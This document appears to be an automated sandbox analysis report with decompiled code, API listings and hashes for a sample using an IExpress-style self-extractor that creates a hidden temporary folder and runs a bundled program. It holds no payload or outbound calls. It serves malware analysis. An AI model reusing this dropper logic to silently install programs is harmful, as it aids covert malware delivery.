                                                                                                                                                                                                                                              																	__eflags = _t68;
                                                                                                                                                                                                                                              																	if(_t68 == 0) {
                                                                                                                                                                                                                                              																		goto L28;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                              																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                              																			L30:
                                                                                                                                                                                                                                              																			_push(0);
                                                                                                                                                                                                                                              																			_t103 = 3;
                                                                                                                                                                                                                                              																			_t49 = E001A597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                              																			__eflags = _t49;
                                                                                                                                                                                                                                              																			if(_t49 != 0) {
                                                                                                                                                                                                                                              																				L33:
                                                                                                                                                                                                                                              																				_t50 = E001A2630(0,  &_v268, 1);
                                                                                                                                                                                                                                              																				__eflags = _t50;
                                                                                                                                                                                                                                              																				if(_t50 != 0) {
                                                                                                                                                                                                                                              																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				_t88 =  &_v268;
                                                                                                                                                                                                                                              																				E001A658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                              																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                              																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                              																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                              																					__eflags = _t54;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				__eflags = _t54;
                                                                                                                                                                                                                                              																				if(_t54 != 0) {
                                                                                                                                                                                                                                              																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                              																					_push(_t88);
                                                                                                                                                                                                                                              																					_t109 = 0x1a91e4;
                                                                                                                                                                                                                                              																					E001A1781(0x1a91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                              																					_t101 = 1;
                                                                                                                                                                                                                                              																					_t59 = E001A5467(0x1a91e4, 1, 0);
                                                                                                                                                                                                                                              																					__eflags = _t59;
                                                                                                                                                                                                                                              																					if(_t59 != 0) {
                                                                                                                                                                                                                                              																						goto L45;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						_t60 = _v268;
                                                                                                                                                                                                                                              																						goto L42;
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                              																					_v265 = 0;
                                                                                                                                                                                                                                              																					_v268 = _t60;
                                                                                                                                                                                                                                              																					goto L42;
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				_t65 = E001A2630(0,  &_v268, 1);
                                                                                                                                                                                                                                              																				__eflags = _t65;
                                                                                                                                                                                                                                              																				if(_t65 != 0) {
                                                                                                                                                                                                                                              																					goto L28;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t67 = E001A597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                              																					__eflags = _t67;
                                                                                                                                                                                                                                              																					if(_t67 == 0) {
                                                                                                                                                                                                                                              																						goto L28;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						goto L33;
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			goto L28;
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L22;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L47;
                                                                                                                                                                                                                                              												L42:
                                                                                                                                                                                                                                              												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                              											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										goto L43;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t101 = 1;
                                                                                                                                                                                                                                              										_t69 = E001A5467(0x1a91e4, 1, 3); // executed
                                                                                                                                                                                                                                              										__eflags = _t69;
                                                                                                                                                                                                                                              										if(_t69 != 0) {
                                                                                                                                                                                                                                              											goto L45;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t82 = 0x1a91e4;
                                                                                                                                                                                                                                              											_t70 = E001A2630(0, 0x1a91e4, 1);
                                                                                                                                                                                                                                              											__eflags = _t70;
                                                                                                                                                                                                                                              											if(_t70 != 0) {
                                                                                                                                                                                                                                              												goto L19;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t101 = 1;
                                                                                                                                                                                                                                              												_t82 = 0x1a91e4;
                                                                                                                                                                                                                                              												_t71 = E001A5467(0x1a91e4, 1, 1);
                                                                                                                                                                                                                                              												__eflags = _t71;
                                                                                                                                                                                                                                              												if(_t71 != 0) {
                                                                                                                                                                                                                                              													goto L45;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													do {
                                                                                                                                                                                                                                              														goto L19;
                                                                                                                                                                                                                                              														L43:
                                                                                                                                                                                                                                              														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                              														_push(4);
                                                                                                                                                                                                                                              														_t101 = 3;
                                                                                                                                                                                                                                              														_t82 =  &_v268;
                                                                                                                                                                                                                                              														_t44 = E001A597D(_t82, _t101, 1);
                                                                                                                                                                                                                                              														__eflags = _t44;
                                                                                                                                                                                                                                              													} while (_t44 != 0);
                                                                                                                                                                                                                                              													goto L2;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                              							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                                              								_t72 = 1;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0x1a8b3f - _t35; // 0x0
                                                                                                                                                                                                                                              								_t72 = 0;
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L10;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t101 = 0;
                                                                                                                                                                                                                                              							_t73 = E001A5467(0x1a8b3e, 0, _t72);
                                                                                                                                                                                                                                              							__eflags = _t73;
                                                                                                                                                                                                                                              							if(_t73 != 0) {
                                                                                                                                                                                                                                              								L45:
                                                                                                                                                                                                                                              								_t38 = 1;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t101 = 0x4be;
                                                                                                                                                                                                                                              								E001A44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L2;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t101 = 0x4b1;
                                                                                                                                                                                                                                              						E001A44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x80070714;
                                                                                                                                                                                                                                              						goto L2;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t101 = 0x4b5;
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					_t38 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L47:
                                                                                                                                                                                                                                              				return E001A6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x001a580a
                                                                                                                                                                                                                                              0x001a580a
                                                                                                                                                                                                                                              0x001a57fa
                                                                                                                                                                                                                                              0x001a5802
                                                                                                                                                                                                                                              0x001a5802
                                                                                                                                                                                                                                              0x001a580d
                                                                                                                                                                                                                                              0x001a580f
                                                                                                                                                                                                                                              0x001a5830
                                                                                                                                                                                                                                              0x001a5836
                                                                                                                                                                                                                                              0x001a583d
                                                                                                                                                                                                                                              0x001a584b
                                                                                                                                                                                                                                              0x001a5851
                                                                                                                                                                                                                                              0x001a5855
                                                                                                                                                                                                                                              0x001a585a
                                                                                                                                                                                                                                              0x001a585c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a585e
                                                                                                                                                                                                                                              0x001a585e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a585e
                                                                                                                                                                                                                                              0x001a5811
                                                                                                                                                                                                                                              0x001a5817
                                                                                                                                                                                                                                              0x001a5819
                                                                                                                                                                                                                                              0x001a581f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a581f
                                                                                                                                                                                                                                              0x001a5791
                                                                                                                                                                                                                                              0x001a5797
                                                                                                                                                                                                                                              0x001a579c
                                                                                                                                                                                                                                              0x001a579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a57a0
                                                                                                                                                                                                                                              0x001a57a9
                                                                                                                                                                                                                                              0x001a57ae
                                                                                                                                                                                                                                              0x001a57b0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a57b0
                                                                                                                                                                                                                                              0x001a579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5769
                                                                                                                                                                                                                                              0x001a5762
                                                                                                                                                                                                                                              0x001a5753
                                                                                                                                                                                                                                              0x001a574f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a572e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5864
                                                                                                                                                                                                                                              0x001a5864
                                                                                                                                                                                                                                              0x001a5864
                                                                                                                                                                                                                                              0x001a5717
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a56c3
                                                                                                                                                                                                                                              0x001a56c5
                                                                                                                                                                                                                                              0x001a56c9
                                                                                                                                                                                                                                              0x001a56ce
                                                                                                                                                                                                                                              0x001a56d0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a56d6
                                                                                                                                                                                                                                              0x001a56d6
                                                                                                                                                                                                                                              0x001a56d8
                                                                                                                                                                                                                                              0x001a56dd
                                                                                                                                                                                                                                              0x001a56df
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a56e1
                                                                                                                                                                                                                                              0x001a56e2
                                                                                                                                                                                                                                              0x001a56e4
                                                                                                                                                                                                                                              0x001a56e6
                                                                                                                                                                                                                                              0x001a56eb
                                                                                                                                                                                                                                              0x001a56ed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a56f3
                                                                                                                                                                                                                                              0x001a56f3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a586c
                                                                                                                                                                                                                                              0x001a5878
                                                                                                                                                                                                                                              0x001a587e
                                                                                                                                                                                                                                              0x001a5882
                                                                                                                                                                                                                                              0x001a5883
                                                                                                                                                                                                                                              0x001a5889
                                                                                                                                                                                                                                              0x001a588e
                                                                                                                                                                                                                                              0x001a588e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5896
                                                                                                                                                                                                                                              0x001a56ed
                                                                                                                                                                                                                                              0x001a56df
                                                                                                                                                                                                                                              0x001a56d0
                                                                                                                                                                                                                                              0x001a56c1
                                                                                                                                                                                                                                              0x001a56a8
                                                                                                                                                                                                                                              0x001a565b
                                                                                                                                                                                                                                              0x001a565b
                                                                                                                                                                                                                                              0x001a565d
                                                                                                                                                                                                                                              0x001a5669
                                                                                                                                                                                                                                              0x001a5669
                                                                                                                                                                                                                                              0x001a565f
                                                                                                                                                                                                                                              0x001a565f
                                                                                                                                                                                                                                              0x001a5665
                                                                                                                                                                                                                                              0x001a5667
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5667
                                                                                                                                                                                                                                              0x001a566c
                                                                                                                                                                                                                                              0x001a5673
                                                                                                                                                                                                                                              0x001a5678
                                                                                                                                                                                                                                              0x001a567a

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001A55CF
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 001A5638
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 001A564C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 001A5620
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                                • Part of subcall function 001A6285: GetLastError.KERNEL32(001A5BBC), ref: 001A6285
                                                                                                                                                                                                                                              • GetTempPathA.KERNELBASE(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A56B9
                                                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 001A571E
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 001A5737
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001A57CD
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001A57EF
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 001A5802
                                                                                                                                                                                                                                                • Part of subcall function 001A2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 001A2654
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 001A5830
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: FindResourceA.KERNEL32(001A0000,000007D6,00000005), ref: 001A652A
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: LoadResource.KERNEL32(001A0000,00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001A6538
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: DialogBoxIndirectParamA.USER32(001A0000,00000000,00000547,001A19E0,00000000), ref: 001A6557
                                                                                                                                                                                                                                                • Part of subcall function 001A6517: FreeResource.KERNEL32(00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001A6560
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 001A5878
                                                                                                                                                                                                                                                • Part of subcall function 001A597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001A59A8
                                                                                                                                                                                                                                                • Part of subcall function 001A597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001A59AF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                              • API String ID: 2436801531-1384155332
                                                                                                                                                                                                                                              • Opcode ID: 8d506d77e1931f79e5e796806d47addbd589c96b376f3795c3fd404ddbdbf18d
                                                                                                                                                                                                                                              • Instruction ID: 26b0069b59ecf256c967e961f73a56dca7c5a1b080c727e08bc1b0cab20accb4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d506d77e1931f79e5e796806d47addbd589c96b376f3795c3fd404ddbdbf18d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47813ABCA08A04ABDB24AB758D41BFE766F9F67300F440065F586E3591EF748DC5CA60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 324 1a597d-1a59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 1a59bb-1a59d8 call 1a44b9 call 1a6285 324->325 326 1a59dd-1a5a1b GetDiskFreeSpaceA 324->326 341 1a5c05-1a5c14 call 1a6ce0 325->341 328 1a5ba1-1a5bde memset call 1a6285 GetLastError FormatMessageA 326->328 329 1a5a21-1a5a4a MulDiv 326->329 338 1a5be3-1a5bfc call 1a44b9 SetCurrentDirectoryA 328->338 329->328 332 1a5a50-1a5a6c GetVolumeInformationA 329->332 335 1a5a6e-1a5ab0 memset call 1a6285 GetLastError FormatMessageA 332->335 336 1a5ab5-1a5aca SetCurrentDirectoryA 332->336 335->338 340 1a5acc-1a5ad1 336->340 352 1a5c02 338->352 344 1a5ae2-1a5ae4 340->344 345 1a5ad3-1a5ad8 340->345 349 1a5ae6 344->349 350 1a5ae7-1a5af8 344->350 345->344 347 1a5ada-1a5ae0 345->347 347->340 347->344 349->350 351 1a5af9-1a5afb 350->351 354 1a5afd-1a5b03 351->354 355 1a5b05-1a5b08 351->355 356 1a5c04 352->356 354->351 354->355 357 1a5b0a-1a5b1b call 1a44b9 355->357 358 1a5b20-1a5b27 355->358 356->341 357->352 360 1a5b29-1a5b33 358->360 361 1a5b52-1a5b5b 358->361 360->361 363 1a5b35-1a5b50 360->363 364 1a5b62-1a5b6d 361->364 363->364 365 1a5b6f-1a5b74 364->365 366 1a5b76-1a5b7d 364->366 367 1a5b85 365->367 368 1a5b7f-1a5b81 366->368 369 1a5b83 366->369 370 1a5b96-1a5b9f 367->370 371 1a5b87-1a5b94 call 1a268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                                                                              			E001A597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v788;
                                                                                                                                                                                                                                              				long _v792;
                                                                                                                                                                                                                                              				long _v796;
                                                                                                                                                                                                                                              				long _v800;
                                                                                                                                                                                                                                              				signed int _v804;
                                                                                                                                                                                                                                              				long _v808;
                                                                                                                                                                                                                                              				int _v812;
                                                                                                                                                                                                                                              				long _v816;
                                                                                                                                                                                                                                              				long _v820;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				signed int _t73;
                                                                                                                                                                                                                                              				signed short _t78;
                                                                                                                                                                                                                                              				signed int _t87;
                                                                                                                                                                                                                                              				signed int _t101;
                                                                                                                                                                                                                                              				int _t102;
                                                                                                                                                                                                                                              				unsigned int _t103;
                                                                                                                                                                                                                                              				unsigned int _t105;
                                                                                                                                                                                                                                              				signed int _t111;
                                                                                                                                                                                                                                              				long _t112;
                                                                                                                                                                                                                                              				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x1a8004; // 0x56898003
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x1a9124 = E001A6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E001A44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x1a9a34 & 0x00000008;
							if(( *0x1a9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x1a9a38; // 0x0
								_t110 =  *((intOrPtr*)(0x1a89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x1a9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E001A268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x1a9a38; // 0x0
							_t110 =  *((intOrPtr*)(0x1a89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1a89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x1a9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E001A44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x1a9124 = E001A6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
                                                                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t110 = 0x4bc;
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					_t66 = 0;
                                                                                                                                                                                                                                              					L33:
                                                                                                                                                                                                                                              					return E001A6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}



































                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5b35
                                                                                                                                                                                                                                              0x001a5b48
                                                                                                                                                                                                                                              0x001a5b4a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5b4a
                                                                                                                                                                                                                                              0x001a5b0f
                                                                                                                                                                                                                                              0x001a5b16
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5b16
                                                                                                                                                                                                                                              0x001a5a7c
                                                                                                                                                                                                                                              0x001a5a8a
                                                                                                                                                                                                                                              0x001a5aa5
                                                                                                                                                                                                                                              0x001a5aab
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a59bb
                                                                                                                                                                                                                                              0x001a59c0
                                                                                                                                                                                                                                              0x001a59c7
                                                                                                                                                                                                                                              0x001a59d1
                                                                                                                                                                                                                                              0x001a59d6
                                                                                                                                                                                                                                              0x001a5c05
                                                                                                                                                                                                                                              0x001a5c14
                                                                                                                                                                                                                                              0x001a5c14

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001A59A8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 001A59AF
                                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 001A5A13
                                                                                                                                                                                                                                              • MulDiv.KERNEL32(?,?,00000400), ref: 001A5A40
                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 001A5A64
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 001A5A7C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001A5A98
                                                                                                                                                                                                                                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 001A5AA5
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 001A5BFC
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                                • Part of subcall function 001A6285: GetLastError.KERNEL32(001A5BBC), ref: 001A6285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
